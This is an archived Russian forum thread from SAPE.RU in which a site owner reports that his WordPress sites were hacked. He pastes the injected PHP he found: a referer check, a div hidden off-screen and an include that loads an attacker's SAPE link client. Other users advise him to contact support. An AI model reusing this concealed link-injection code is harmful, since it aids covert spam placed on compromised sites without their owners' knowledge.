Форум SAPE.RU

Форум SAPE.RU (http://forum.sape.ru/index.php)
-   Вопросы по работе системы (http://forum.sape.ru/forumdisplay.php?f=13)
-   -   Взламывают сайты, примите меры (http://forum.sape.ru/showthread.php?t=76871)

-=Drakon=- 12.01.2012 01:59
Взламывают сайты, примите меры
 
Здравствуйте, сегодня обнаружил на нескольких своих сайтах посторонние ссылки, посмотрел код а там:

PHP код:
<?php
$d=getenv("HTTP_REFERER");
$qexplode("/"$d ); 
$w="123sdfsdfsdfsd.ru";
if($w == $q[2]) {
include ($_SERVER['DOCUMENT_ROOT'].'/wp-includes/Text/Diff/Renderer/sap.php');
}
else{
     echo '<div style="position:absolute;left:-2000px;width:2000px">';
include ($_SERVER['DOCUMENT_ROOT'].'/wp-includes/Text/Diff/Renderer/sap.php');
 echo '</div>';
}
?>
По коду видно, что какие-то данные берутся из файла sap.php, открываю его содержимое и вижу такое:

PHP код:
<?php
global $sape;

     if (!defined('_SAPE_USER')){
        define('_SAPE_USER''371ecc18fa6103ff44350d08acd762e4'); 
     }
     require_once($_SERVER['DOCUMENT_ROOT'].'/wp-includes/pomo/'._SAPE_USER.'/sape.php'); 
     $o['charset'] = 'UTF-8';
$sape = new SAPE_client($o);
unset($o);
echo $sape->return_links($n);
?>
Как видно, негодяй взломал сайты и вставил свой код сапы (на 6 сайтах замечен этот код). Самое обидное, что эти сайты мною еще не были добавлены в систему сапы, поскольку слишком свежие и над ними в данный момент ведутся работы (контент, пузо).

Просьба к администрации - разберитесь пожалуйста с данной ситацией, как видно, данное чмо оставляет свой код '_SAPE_USER', '371ecc18fa6103ff44350d08acd762e4'
Примите пожалуйста меры по отношению к данному индивидууму.

Клон 12.01.2012 02:23
http://forum.sape.ru/showthread.php?t=17930
пункт 3 и 4

-=Drakon=- 12.01.2012 02:33
Клон, принято.

imcl 12.01.2012 02:40
кагбе, правильно делает человек, что сообщает.

просто, сделать удалить код и доказать свои права - это мало. надо злодея акк побанить.

только писать надо не сюда, а в саппорт

zhegloff 12.01.2012 02:43
Цитата:
Сообщение от imcl (Сообщение 1192081)
просто, сделать удалить код и доказать свои права - это мало. надо злодея акк побанить.
Чтобы акк побанить нужно сначала доказать, свои права.
А акки банят чуть ли не каждый день взломщикам, не волнуйтесь.

-=Drakon=- 12.01.2012 02:58
zhegloff, только что отправил запрос в ТП, с подтверждением того, что являюсь владельцем взломанных сайтов (в корне каждого сайта sape.txt с моим логином в сапе).
Очень надеюсь, что заблокируете эту сволочь и не дадите ему наживаться на других.

imcl, согласен, но банить нужно публично.

zhegloff 12.01.2012 03:22
Цитата:
Сообщение от -=Drakon=- (Сообщение 1192088)
zhegloff, только что отправил запрос в ТП, с подтверждением того, что являюсь владельцем взломанных сайтов (в корне каждого сайта sape.txt с моим логином в сапе).
Очень надеюсь, что заблокируете эту сволочь и не дадите ему наживаться на других.
Заблокируют, не волнуйтесь.


Часовой пояс GMT +3, время: 20:27.

Работает на vBulletin® версия 3.8.7.
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Перевод: zCarot
SAPE.RU — система купли-продажи ссылок с главных и внутренних страниц сайтов.